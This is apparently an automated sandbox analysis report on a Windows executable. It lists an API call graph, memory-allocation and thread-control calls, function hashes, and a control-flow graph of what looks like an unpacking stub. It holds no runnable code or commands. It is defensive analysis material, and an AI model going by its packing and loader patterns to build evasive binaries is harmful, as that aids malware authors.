18870->18871 18872 7ff708e235b9 18871->18872 18873 7ff708e1cc80 15 API calls 18872->18873 18874 7ff708e235e2 18873->18874 18875 7ff708e1cc80 15 API calls 18874->18875 18876 7ff708e2360b 18875->18876 18877 7ff708e1cc80 15 API calls 18876->18877 18878 7ff708e23634 18877->18878 18879 7ff708e1cc80 15 API calls 18878->18879 18880 7ff708e2365d 18879->18880 18881 7ff708e1cc80 15 API calls 18880->18881 18882 7ff708e2368b 18881->18882 18883 7ff708e1cc80 15 API calls 18882->18883 18884 7ff708e236b9 18883->18884 18885 7ff708e1cc80 15 API calls 18884->18885 18886 7ff708e236e2 18885->18886 18887 7ff708e1cc80 15 API calls 18886->18887 18888 7ff708e2370b 18887->18888 18889 7ff708e1cc80 15 API calls 18888->18889 18890 7ff708e23734 18889->18890 18891 7ff708e1cc80 15 API calls 18890->18891 18892 7ff708e2375d 18891->18892 18893 7ff708e1cc80 15 API calls 18892->18893 18894 7ff708e2378b 18893->18894 18895 7ff708e1cc80 15 API calls 18894->18895 18896 7ff708e237b9 18895->18896 18897 7ff708e1cc80 15 API calls 18896->18897 18898 7ff708e237e2 18897->18898 18899 7ff708e1cc80 15 API calls 18898->18899 18900 7ff708e2380b 18899->18900 18901 7ff708e1cc80 15 API calls 18900->18901 18902 7ff708e23834 18901->18902 18903 7ff708e1cc80 15 API calls 18902->18903 18904 7ff708e2385d 18903->18904 18905 7ff708e1cc80 15 API calls 18904->18905 18906 7ff708e23886 18905->18906 18907 7ff708e1cc80 15 API calls 18906->18907 18908 7ff708e238af 18907->18908 18909 7ff708e1cc80 15 API calls 18908->18909 18910 7ff708e238d8 18909->18910 18911 7ff708e1cc80 15 API calls 18910->18911 18912 7ff708e23901 18911->18912 18913 7ff708e1cc80 15 API calls 18912->18913 18914 7ff708e2392a 18913->18914 18915 7ff708e1cc80 15 API calls 18914->18915 18916 7ff708e23953 18915->18916 18917 7ff708e1cc80 15 API calls 18916->18917 18918 7ff708e2397c 18917->18918 18919 7ff708e1cc80 15 API calls 18918->18919 18920 7ff708e239a5 18919->18920 18921 7ff708e1cc80 15 API calls 18920->18921 18922 7ff708e239ce 18921->18922 18923 7ff708e1cc80 15 API calls 18922->18923 18924 7ff708e239f7 18923->18924 18925 7ff708e1cc80 15 API calls 18924->18925 18926 7ff708e23a20 18925->18926 18927 7ff708e1cc80 15 API calls 18926->18927 18928 7ff708e23a49 18927->18928 18929 7ff708e1cc80 15 API calls 18928->18929 18930 7ff708e23a72 18929->18930 18931 7ff708e1cc80 15 API calls 18930->18931 18932 7ff708e23a9b 18931->18932 18933 7ff708e1cc80 15 API calls 18932->18933 18934 7ff708e23ac4 18933->18934 18935 7ff708e1cc80 15 API calls 18934->18935 18936 7ff708e23aed 18935->18936 18937 7ff708e1cc80 15 API calls 18936->18937 18938 7ff708e23b16 18937->18938 18939 7ff708e1cc80 15 API calls 18938->18939 18940 7ff708e23b3f 18939->18940 18941 7ff708e1cc80 15 API calls 18940->18941 18942 7ff708e23b68 18941->18942 18943 7ff708e1cc80 15 API calls 18942->18943 18944 7ff708e23b96 18943->18944 18945 7ff708e1cc80 15 API calls 18944->18945 18946 7ff708e23bc4 18945->18946 18947 7ff708e1cc80 15 API calls 18946->18947 18948 7ff708e23bf2 18947->18948 18949 7ff708e1cc80 15 API calls 18948->18949 18950 7ff708e23c20 18949->18950 18951 7ff708e1cc80 15 API calls 18950->18951 18952 7ff708e23c4e 18951->18952 18953 7ff708e1cc80 15 API calls 18952->18953 18954 7ff708e23c7c 18953->18954 18955 7ff708e1cc80 15 API calls 18954->18955 18956 7ff708e23ca5 18955->18956 18957 7ff708e1cc80 15 API calls 18956->18957 18958 7ff708e23cd3 18957->18958 18959 7ff708e1cc80 15 API calls 18958->18959 18960 7ff708e23cfc 18959->18960 18961 7ff708e1cc80 15 API calls 18960->18961 18962 7ff708e23d25 18961->18962 18963 7ff708e1cc80 15 API calls 18962->18963 18964 7ff708e1c305 18963->18964 18965 7ff708e21f60 GetSystemInfo 18964->18965 18966 7ff708e21fa4 18965->18966 18967 7ff708e21fa8 GetNumaHighestNodeNumber 18966->18967 18968 7ff708e21fb7 __raise_securityfailure 18966->18968 18967->18968 18969 7ff708e21fdf GetProcessGroupAffinity 18968->18969 18970 7ff708e21ff9 GetLastError 18969->18970 18971 7ff708e22004 18969->18971 18970->18971 18973 7ff708e22026 __raise_securityfailure 18971->18973 19007 7ff708e21d40 GetLogicalProcessorInformationEx 18971->19007 18974 7ff708e22096 GetProcessAffinityMask 18973->18974 18975 7ff708e1c30a 18973->18975 18974->18975 18975->18773 18975->18779 18977 7ff708e1cba4 18976->18977 18978 7ff708e1cba8 18977->18978 18979 7ff708e1d7f0 6 API calls 18977->18979 18978->18832 18980 7ff708e1cbd4 18979->18980 18980->18832 18982 7ff708e1ccaa 18981->18982 18983 7ff708e1cdbf 18981->18983 18984 7ff708e1ccb7 00007FFE1FFB5630 18982->18984 18985 7ff708e1cccf 18982->18985 18986 7ff708e1d7f0 6 API calls 18983->18986 18984->18985 18990 7ff708e1ccc7 18984->18990 18987 7ff708e1ccdc 00007FFE1FFB5630 18985->18987 18988 7ff708e1ccef 18985->18988 18989 7ff708e1cdd6 18986->18989 18987->18988 18987->18990 18991 7ff708e1ccfc 00007FFE1FFB5630 18988->18991 18992 7ff708e1cd0f 18988->18992 18989->18990 19003 7ff708e1d970 18989->19003 18990->18857 18991->18990 18991->18992 18993 7ff708e1cd1c 00007FFE1FFB5630 18992->18993 18994 7ff708e1cd2f 18992->18994 18993->18990 18993->18994 18995 7ff708e1cd3c 00007FFE1FFB5630 18994->18995 18996 7ff708e1cd53 18994->18996 18995->18990 18995->18996 18998 7ff708e1cd77 18996->18998 18999 7ff708e1cd60 00007FFE1FFB5630 18996->18999 19000 7ff708e1cd9b 18998->19000 19001 7ff708e1cd84 00007FFE1FFB5630 18998->19001 18999->18990 18999->18998 19000->18983 19002 7ff708e1cda8 00007FFE1FFB5630 19000->19002 19001->18990 19001->19000 19002->18983 19002->18990 19004 7ff708e1d9be 19003->19004 19005 7ff708e1d994 19003->19005 19004->18990 19005->19004 19006 7ff708e1d9d5 00007FFE1FFAFE50 19005->19006 19006->19004 19008 7ff708e21f2c 19007->19008 19009 7ff708e21d72 GetLastError 19007->19009 19008->18973 19009->19008 19010 7ff708e21d81 19009->19010 19010->19008 19011 7ff708e21d9d GetLogicalProcessorInformationEx 19010->19011 19012 7ff708e21dc0 19011->19012 19012->18973 19014 7ff708e70c34 _swprintf_c_l RaiseException 19013->19014 19015 7ff708e12e4e 19014->19015 19015->18794 19033 7ff708e24870 19016->19033 19018 7ff708e1cf2b 19018->18806 19019 7ff708e16800 19018->19019 19020 7ff708e16812 19019->19020 19021 7ff708e1684d 19020->19021 19044 7ff708e21410 CreateEventW 19020->19044 19021->18809 19023 7ff708e16824 19023->19021 19045 7ff708e1c540 CreateThread 19023->19045 19025 7ff708e16843 19025->18809 19027 7ff708e1e447 19026->19027 19028 7ff708e1e44f 19027->19028 19029 7ff708e70c34 _swprintf_c_l RaiseException 19027->19029 19028->18810 19031 7ff708e1e481 19029->19031 19032 7ff708e1e515 19031->19032 19048 7ff708e24cd0 19031->19048 19032->18810 19038 7ff708e255a0 19033->19038 19037 7ff708e248af 19037->19018 19039 7ff708e70c34 _swprintf_c_l RaiseException 19038->19039 19040 7ff708e24898 19039->19040 19040->19037 19041 7ff708e270f0 19040->19041 19042 7ff708e70c34 _swprintf_c_l RaiseException 19041->19042 19043 7ff708e27105 19042->19043 19043->19037 19044->19023 19046 7ff708e1c56f 19045->19046 19047 7ff708e1c575 SetThreadPriority ResumeThread CloseHandle 19045->19047 19046->19025 19047->19025 19050 7ff708e24d03 _swprintf_c_l 19048->19050 19049 7ff708e24d20 _swprintf_c_l 19049->19031 19050->19049 19052 7ff708e25c80 19050->19052 19061 7ff708e222b0 19052->19061 19054 7ff708e25ca2 19055 7ff708e25caa 19054->19055 19065 7ff708e221e0 19054->19065 19055->19049 19057 7ff708e25cc8 19058 7ff708e25cd3 _swprintf_c_l 19057->19058 19069 7ff708e22290 VirtualFree 19057->19069 19058->19049 19060 7ff708e25dee 19060->19049 19062 7ff708e222f4 __raise_securityfailure 19061->19062 19063 7ff708e222d5 VirtualAlloc 19061->19063 19064 7ff708e22303 VirtualAllocExNuma 19062->19064 19063->19062 19064->19054 19066 7ff708e221fb VirtualAlloc 19065->19066 19067 7ff708e2221e __raise_securityfailure 19065->19067 19066->19057 19068 7ff708e2222d VirtualAllocExNuma 19067->19068 19068->19057 19069->19060 19073 7ff708e1da36 19070->19073 19071 7ff708e70ce0 6 API calls 19072 7ff708e1dada 19071->19072 19072->18814 19073->19071 19074->18829 19076 7ff708e70c34 _swprintf_c_l RaiseException 19075->19076 19077 7ff708e147fc 19076->19077 19077->18757 19079 7ff708e15f78 19078->19079 19080 7ff708e15f3f 19078->19080 19079->18761 19080->19079 19081 7ff708e1600f 19080->19081 19084 7ff708e15ff6 19080->19084 19088 7ff708e15fd7 19080->19088 19089 7ff708e15fb8 19080->19089 19082 7ff708e1602f 19081->19082 19083 7ff708e16016 19081->19083 19085 7ff708e1605f 19082->19085 19128 7ff708e15da0 GetLastError 19082->19128 19087 7ff708e1c440 2 API calls 19083->19087 19122 7ff708e12d00 19084->19122 19085->18761 19091 7ff708e16022 RaiseFailFastException 19087->19091 19088->19084 19093 7ff708e15fe9 RaiseFailFastException 19088->19093 19092 7ff708e15fc0 Sleep 19089->19092 19091->19082 19092->19088 19092->19092 19093->19084 19095 7ff708e70c34 _swprintf_c_l RaiseException 19094->19095 19096 7ff708e149fa 19095->19096 19097 7ff708f0e4c0 19096->19097 19098 7ff708f0e4fc 19097->19098 19099 7ff708f0e65a 19098->19099 19105 7ff708f0e524 19098->19105 19139 7ff708f0fa70 19099->19139 19101 7ff708f0e5d7 19102 7ff708e12890 31 API calls 19101->19102 19104 7ff708f0e5e6 19102->19104 19104->18765 19105->19101 19134 7ff708e14970 19105->19134 19107 7ff708ee7b5a 19106->19107 19108 7ff708ee7b5f 19107->19108 19109 7ff708e12770 15 API calls 19107->19109 19108->18771 19110 7ff708ee7b71 19109->19110 19111 7ff708e13650 22 API calls 19110->19111 19112 7ff708ee7b84 19111->19112 19113 7ff708ee7b9f 19112->19113 19114 7ff708e12770 15 API calls 19112->19114 19113->18771 19115 7ff708ee7bb1 19114->19115 19116 7ff708e13650 22 API calls 19115->19116 19117 7ff708ee7bc4 19116->19117 19119 7ff708f0e698 19118->19119 19121 7ff708f0e6c8 19119->19121 19187 7ff708f0e800 19119->19187 19121->18767 19123 7ff708e12d26 19122->19123 19127 7ff708e12d44 19123->19127 19131 7ff708e1bfa0 FlsGetValue 19123->19131 19125 7ff708e12d3c 19126 7ff708e15360 RaiseFailFastException GetCurrentThreadId VirtualQuery RaiseException 19125->19126 19126->19127 19127->19081 19129 7ff708e15dd0 19128->19129 19130 7ff708e15df6 SetLastError 19129->19130 19132 7ff708e1bfc8 FlsSetValue 19131->19132 19133 7ff708e1bfba RaiseFailFastException 19131->19133 19133->19132 19173 7ff708e1d480 19134->19173 19137 7ff708e70c34 _swprintf_c_l RaiseException 19138 7ff708e1499a 19137->19138 19138->19105 19140 7ff708e12770 15 API calls 19139->19140 19141 7ff708f0fa81 19140->19141 19142 7ff708e13650 22 API calls 19141->19142 19143 7ff708f0fa94 19142->19143 19144 7ff708e12770 15 API calls 19143->19144 19145 7ff708f0fab1 19144->19145 19146 7ff708e13650 22 API calls 19145->19146 19147 7ff708f0fac4 19146->19147 19177 7ff708f0ce40 19147->19177 19149 7ff708f0fad9 19150 7ff708e13650 22 API calls 19149->19150 19151 7ff708f0fae1 19150->19151 19182 7ff708f0ceb0 19151->19182 19174 7ff708e1d4ac 19173->19174 19176 7ff708e1497f 19173->19176 19175 7ff708e70c34 _swprintf_c_l RaiseException 19174->19175 19174->19176 19175->19176 19176->19137 19178 7ff708e12770 15 API calls 19177->19178 19179 7ff708f0ce5c 19178->19179 19180 7ff708ebfa60 31 API calls 19179->19180 19181 7ff708f0ce74 19180->19181 19181->19149 19183 7ff708e12770 15 API calls 19182->19183 19184 7ff708f0cec4 19183->19184 19185 7ff708e13650 22 API calls 19184->19185 19186 7ff708f0cee1 19185->19186 19188 7ff708e12890 31 API calls 19187->19188 19189 7ff708f0e846 19188->19189 19189->19121 19190 7ff708e16780 19191 7ff708e12d00 7 API calls 19190->19191 19192 7ff708e16792 19191->19192 19195 7ff708ee83e0 19192->19195 19196 7ff708e15f10 14 API calls 19195->19196 19197 7ff708ee8401 19196->19197 19202 7ff708ed0da0 19197->19202 19200 7ff708ee8406 19205 7ff708e168e0 19200->19205 19210 7ff708e168b0 19200->19210 19214 7ff708ed0de0 19202->19214 19204 7ff708ed0daf 19204->19200 19208 7ff708e168f0 19205->19208 19206 7ff708e168fc WaitForSingleObjectEx 19206->19208 19209 7ff708e16934 19206->19209 19207 7ff708e16925 19207->19200 19208->19206 19208->19207 19209->19200 19211 7ff708e168c6 19210->19211 19212 7ff708e2146a 19211->19212 19213 7ff708e21471 SetEvent 19211->19213 19212->19200 19213->19200 19216 7ff708ed0dff 19214->19216 19215 7ff708ed0e4e 19215->19204 19216->19215 19217 7ff708ed0e9a 19216->19217 19219 7ff708e12770 15 API calls 19216->19219 19218 7ff708e12770 15 API calls 19217->19218 19220 7ff708ed0ea6 19218->19220 19221 7ff708ed0e87 19219->19221 19222 7ff708e13650 22 API calls 19220->19222 19223 7ff708e13650 22 API calls 19221->19223 19224 7ff708ed0eb9 19222->19224 19223->19217 19225 7ff708e420e0 19226 7ff708e420fd 19225->19226 19251 7ff708e221a0 VirtualAlloc 19226->19251 19228 7ff708e42123 19229 7ff708e42176 19228->19229 19329 7ff708e21f40 RtlInitializeCriticalSection 19228->19329 19254 7ff708e21f40 RtlInitializeCriticalSection 19229->19254 19232 7ff708e42182 19233 7ff708e425a8 19232->19233 19255 7ff708e52f20 19232->19255 19235 7ff708e421b1 _swprintf_c_l 19250 7ff708e423ef 19235->19250 19265 7ff708e41de0 19235->19265 19237 7ff708e42384 19269 7ff708e3fa10 19237->19269 19240 7ff708e222b0 2 API calls 19241 7ff708e423be 19240->19241 19241->19250 19273 7ff708e425d0 19241->19273 19243 7ff708e423e0 19244 7ff708e423e4 19243->19244 19246 7ff708e42413 19243->19246 19330 7ff708e22290 VirtualFree 19244->19330 19246->19250 19291 7ff708e55b10 19246->19291 19252 7ff708e221d9 19251->19252 19253 7ff708e221c1 VirtualFree 19251->19253 19252->19228 19253->19228 19254->19232 19256 7ff708e52f4f 19255->19256 19257 7ff708e52f7c 19256->19257 19258 7ff708e52f72 19256->19258 19264 7ff708e52fa7 19256->19264 19260 7ff708e222b0 2 API calls 19257->19260 19331 7ff708e22330 19258->19331 19262 7ff708e52f8d 19260->19262 19262->19264 19344 7ff708e22290 VirtualFree 19262->19344 19264->19235 19267 7ff708e41dff 19265->19267 19268 7ff708e41e1c 19267->19268 19345 7ff708e21810 19267->19345 19268->19237 19270 7ff708e3fa32 19269->19270 19271 7ff708e70ce0 6 API calls 19270->19271 19272 7ff708e3fb53 19271->19272 19272->19240 19274 7ff708e42605 19273->19274 19275 7ff708e42609 19274->19275 19276 7ff708e42623 19274->19276 19277 7ff708e70ce0 6 API calls 19275->19277 19279 7ff708e42663 RtlAcquirePebLock 19276->19279 19280 7ff708e42690 RtlLeaveCriticalSection 19276->19280 19281 7ff708e221e0 2 API calls 19276->19281 19282 7ff708e426e1 19276->19282 19283 7ff708e42799 RtlLeaveCriticalSection 19276->19283 19285 7ff708e4276f 19276->19285 19278 7ff708e4261b 19277->19278 19278->19243 19279->19276 19279->19280 19280->19276 19281->19276 19284 7ff708e70ce0 6 API calls 19282->19284 19288 7ff708e427a5 19283->19288 19286 7ff708e42767 19284->19286 19287 7ff708e42778 RtlAcquirePebLock 19285->19287 19285->19288 19286->19243 19287->19283 19288->19282 19290 7ff708e427dd RtlAcquirePebLock RtlLeaveCriticalSection 19288->19290 19352 7ff708e22270 VirtualFree 19288->19352 19290->19288 19353 7ff708e55a50 19291->19353 19294 7ff708e417d0 19300 7ff708e417f5 19294->19300 19295 7ff708e41db1 19298 7ff708e41dba 19295->19298 19299 7ff708e41dc6 19295->19299 19296 7ff708e41da5 19371 7ff708e216b0 CloseHandle 19296->19371 19372 7ff708e216b0 CloseHandle 19298->19372 19299->19250 19327 7ff708e4185b 19300->19327 19357 7ff708e21750 19300->19357 19303 7ff708e4189b 19304 7ff708e21750 2 API calls 19303->19304 19303->19327 19305 7ff708e418b1 _swprintf_c_l 19304->19305 19306 7ff708e21930 7 API calls 19305->19306 19305->19327 19307 7ff708e41bd0 19306->19307 19308 7ff708e21750 2 API calls 19307->19308 19309 7ff708e41c4d 19308->19309 19310 7ff708e41c8f 19309->19310 19311 7ff708e21750 2 API calls 19309->19311 19312 7ff708e41d5d 19310->19312 19313 7ff708e41d51 19310->19313 19310->19327 19314 7ff708e41c63 19311->19314 19316 7ff708e41d72 19312->19316 19317 7ff708e41d66 19312->19317 19367 7ff708e216b0 CloseHandle 19313->19367 19314->19310 19362 7ff708e216d0 19314->19362 19319 7ff708e41d87 19316->19319 19320 7ff708e41d7b 19316->19320 19368 7ff708e216b0 CloseHandle 19317->19368 19322 7ff708e41d90 19319->19322 19319->19327 19369 7ff708e216b0 CloseHandle 19320->19369 19370 7ff708e216b0 CloseHandle 19322->19370 19325 7ff708e41c79 19325->19310 19326 7ff708e21750 2 API calls 19325->19326 19326->19310 19327->19295 19327->19296 19328 7ff708e41d2e 19327->19328 19328->19250 19329->19229 19330->19250 19332 7ff708e2235e LookupPrivilegeValueW 19331->19332 19333 7ff708e223f6 GetLargePageMinimum 19331->19333 19336 7ff708e2237a __raise_securityfailure 19332->19336 19337 7ff708e2242f 19332->19337 19334 7ff708e22433 __raise_securityfailure 19333->19334 19335 7ff708e22416 VirtualAlloc 19333->19335 19339 7ff708e22439 VirtualAllocExNuma 19334->19339 19335->19337 19338 7ff708e2239a OpenProcessToken 19336->19338 19340 7ff708e70ce0 6 API calls 19337->19340 19338->19337 19341 7ff708e223b1 AdjustTokenPrivileges GetLastError CloseHandle 19338->19341 19339->19337 19342 7ff708e22466 19340->19342 19341->19337 19343 7ff708e223eb 19341->19343 19342->19262 19343->19333 19343->19337 19344->19264 19346 7ff708e21818 19345->19346 19347 7ff708e21831 GetLogicalProcessorInformation 19346->19347 19351 7ff708e2185d 19346->19351 19348 7ff708e21852 GetLastError 19347->19348 19349 7ff708e21864 19347->19349 19348->19349 19348->19351 19350 7ff708e218a1 GetLogicalProcessorInformation 19349->19350 19349->19351 19350->19351 19351->19268 19352->19288 19354 7ff708e55a69 19353->19354 19356 7ff708e42587 19353->19356 19355 7ff708e55a80 GetEnabledXStateFeatures 19354->19355 19354->19356 19355->19356 19356->19294 19358 7ff708e70c34 _swprintf_c_l RaiseException 19357->19358 19359 7ff708e21776 19358->19359 19360 7ff708e2177e CreateEventW 19359->19360 19361 7ff708e217a0 19359->19361 19360->19361 19361->19303 19363 7ff708e70c34 _swprintf_c_l RaiseException 19362->19363 19364 7ff708e216f6 19363->19364 19365 7ff708e216fe CreateEventW 19364->19365 19366 7ff708e2171e 19364->19366 19365->19366 19366->19325 19367->19312 19368->19316 19369->19319 19370->19327 19371->19295 19372->19299 18640 7ff708e2a8b0 18641 7ff708e2a8ce 18640->18641 18642 7ff708e2a8ed 18641->18642 18643 7ff708e2a8d3 18641->18643 18659 7ff708e1d130 18642->18659 18644 7ff708e70ce0 6 API calls 18643->18644 18646 7ff708e2a8e5 18644->18646 18647 7ff708e2a939 RtlAcquirePebLock 18648 7ff708e2a98e 18647->18648 18649 7ff708e21b10 11 API calls 18648->18649 18650 7ff708e2a9dd 18649->18650 18651 7ff708e23d70 15 API calls 18650->18651 18653 7ff708e2a9e9 18651->18653 18652 7ff708e2aada RtlLeaveCriticalSection 18654 7ff708e2aaed 18652->18654 18653->18652 18657 7ff708e21f40 RtlInitializeCriticalSection 18653->18657 18658 7ff708e2a9f2 18653->18658 18655 7ff708e70ce0 6 API calls 18654->18655 18656 7ff708e2ab3f 18655->18656 18657->18658 18658->18652 18660 7ff708e1d13d 18659->18660 18663 7ff708e13280 18660->18663 18664 7ff708e132c2 18663->18664 18665 7ff708e132e6 NtFlushProcessWriteBuffers 18664->18665 18667 7ff708e13303 18665->18667 18666 7ff708e133e9 18667->18666 18669 7ff708e158c0 18667->18669 18670 7ff708e158e7 18669->18670 18671 7ff708e158c7 18669->18671 18670->18667 18671->18670 18672 7ff708e1c1e2 LoadLibraryExW GetProcAddress 18671->18672 18680 7ff708e1c20e 18671->18680 18672->18680 18673 7ff708e1c26a SuspendThread 18674 7ff708e1c2b8 18673->18674 18675 7ff708e1c278 GetThreadContext 18673->18675 18676 7ff708e70ce0 6 API calls 18674->18676 18677 7ff708e1c2af ResumeThread 18675->18677 18678 7ff708e1c292 18675->18678 18679 7ff708e1c2c8 18676->18679 18677->18674 18678->18677 18679->18667 18680->18673 18680->18674 18681 7ff708e1c254 GetLastError 18680->18681 18681->18674 18682 7ff708e1c25f 18681->18682 18682->18673

                                                                Executed Functions

                                                                Function 00007FF708E21F60 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                                • String ID:
                                                                • API String ID: 580471860-0
                                                                • Opcode ID: 9df24fd3abc950876f639be6f3fb9abef81885c1570445d11b25917063cd2c76
                                                                • Instruction ID: 26cbc3a2b47bd644c175a6cb270276879fbccce024d2031175def43ac3f2d918
                                                                • Opcode Fuzzy Hash: 9df24fd3abc950876f639be6f3fb9abef81885c1570445d11b25917063cd2c76
                                                                • Instruction Fuzzy Hash: 63516E72A0874686EA40EF15EC00669F7A1FF45B80FC48139DA8D87365EF3DE545D728
                                                                Function 00007FF708E15170 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 108COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
                                                                • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                                                                • API String ID: 2052584837-2841289747
                                                                • Opcode ID: 96cb268e9c31ef3e9d012eecaca768489ddbb8f08d0b50dbcc973e01ecc5a1b8
                                                                • Instruction ID: a265fab3f8f8abeadd6a3a18d0c44e213d6a5d57499726dc28898e0a46bd293d
                                                                • Opcode Fuzzy Hash: 96cb268e9c31ef3e9d012eecaca768489ddbb8f08d0b50dbcc973e01ecc5a1b8
                                                                • Instruction Fuzzy Hash: CF415A32E18A4381FE50BB20AC422B9E7A1AF81744FC440B1EA4D5779ADF7CE505C778
                                                                Function 00007FF7090EBCE0 Relevance: 6.2, APIs: 4, Instructions: 197librarymemoryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 178 7ff7090ebce0-7ff7090ebce3 179 7ff7090ebced-7ff7090ebcf1 178->179 180 7ff7090ebcf3-7ff7090ebcfb 179->180 181 7ff7090ebcfd 179->181 180->181 182 7ff7090ebce5-7ff7090ebcea 181->182 183 7ff7090ebcff-7ff7090ebd02 181->183 182->179 184 7ff7090ebd0b-7ff7090ebd12 183->184 186 7ff7090ebd14-7ff7090ebd1c 184->186 187 7ff7090ebd1e 184->187 186->187 188 7ff7090ebd04-7ff7090ebd09 187->188 189 7ff7090ebd20-7ff7090ebd23 187->189 188->184 190 7ff7090ebd25-7ff7090ebd33 189->190 191 7ff7090ebd3e-7ff7090ebd40 189->191 193 7ff7090ebd35-7ff7090ebd3a 190->193 194 7ff7090ebd8d-7ff7090ebdac 190->194 195 7ff7090ebd42-7ff7090ebd48 191->195 196 7ff7090ebd4a 191->196 198 7ff7090ebd74-7ff7090ebd77 193->198 200 7ff7090ebd3c 193->200 197 7ff7090ebddd-7ff7090ebde0 194->197 195->196 196->198 199 7ff7090ebd4c-7ff7090ebd50 196->199 203 7ff7090ebde5-7ff7090ebdeb 197->203 204 7ff7090ebde2-7ff7090ebde3 197->204 211 7ff7090ebd79-7ff7090ebd88 call 7ff7090ebca2 198->211 201 7ff7090ebd52-7ff7090ebd58 199->201 202 7ff7090ebd5a 199->202 200->199 201->202 202->198 205 7ff7090ebd5c-7ff7090ebd63 202->205 208 7ff7090ebdf2-7ff7090ebdf6 203->208 206 7ff7090ebdc4-7ff7090ebdc8 204->206 223 7ff7090ebd65-7ff7090ebd6b 205->223 224 7ff7090ebd6d 205->224 209 7ff7090ebdae-7ff7090ebdb1 206->209 210 7ff7090ebdca-7ff7090ebdcd 206->210 212 7ff7090ebe42-7ff7090ebe4a 208->212 213 7ff7090ebdf8-7ff7090ebe10 LoadLibraryA 208->213 209->203 214 7ff7090ebdb3 209->214 210->203 217 7ff7090ebdcf-7ff7090ebdd3 210->217 211->179 215 7ff7090ebe4e-7ff7090ebe57 212->215 219 7ff7090ebe12-7ff7090ebe19 213->219 220 7ff7090ebdb4-7ff7090ebdb8 214->220 221 7ff7090ebe86-7ff7090ebed5 VirtualProtect * 2 215->221 222 7ff7090ebe59-7ff7090ebe5b 215->222 217->220 225 7ff7090ebdd5-7ff7090ebddc 217->225 219->208 227 7ff7090ebe1b-7ff7090ebe31 GetProcAddress 219->227 220->206 230 7ff7090ebdba-7ff7090ebdbc 220->230 234 7ff7090ebeda-7ff7090ebedf 221->234 231 7ff7090ebe5d-7ff7090ebe6c 222->231 232 7ff7090ebe6e-7ff7090ebe7c 222->232 223->224 224->205 233 7ff7090ebd6f-7ff7090ebd72 224->233 225->197 228 7ff7090ebe33-7ff7090ebe3a 227->228 229 7ff7090ebe3c ExitProcess 227->229 228->219 230->206 235 7ff7090ebdbe-7ff7090ebdc2 230->235 231->215 232->231 236 7ff7090ebe7e-7ff7090ebe84 232->236 233->211 234->234 237 7ff7090ebee1 234->237 235->206 235->210 236->231
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                • String ID:
                                                                • API String ID: 3300690313-0
                                                                • Opcode ID: e4be1c7ec7a8bcfff1ba100b0c64b1c7d443340cc45582966c0bf1821502d58e
                                                                • Instruction ID: 4f6be191ad6e324c3183b66cb9d16532f437f1a47998648af4a2806025a807f6
                                                                • Opcode Fuzzy Hash: e4be1c7ec7a8bcfff1ba100b0c64b1c7d443340cc45582966c0bf1821502d58e
                                                                • Instruction Fuzzy Hash: F1611822F4D15B85FA256E66AC842B8F6709F147BCF880331C7BD463D5EF1CE8428228
